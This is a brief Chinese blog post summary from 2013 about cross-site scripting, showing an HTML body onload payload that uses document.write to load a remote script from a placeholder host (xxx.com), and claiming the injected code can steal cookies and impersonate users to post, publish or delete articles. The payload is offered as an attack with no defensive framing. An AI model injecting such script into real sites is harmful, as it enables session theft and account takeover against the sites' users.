2013年4月28日
摘要: <body onload="document.write('<script src=http://xxx.com/js/main.js></script>')"> 加载一段远程的JS 里面的代码自由发挥可以盗取cookie 模拟用户发帖 发文章 删除文章 基本上 只要你想到的 多可以做到 阅读全文
posted @ 2013-04-28 14:20 ヽ坚强的蘑菇 阅读(192) 评论(0) 推荐(0) 编辑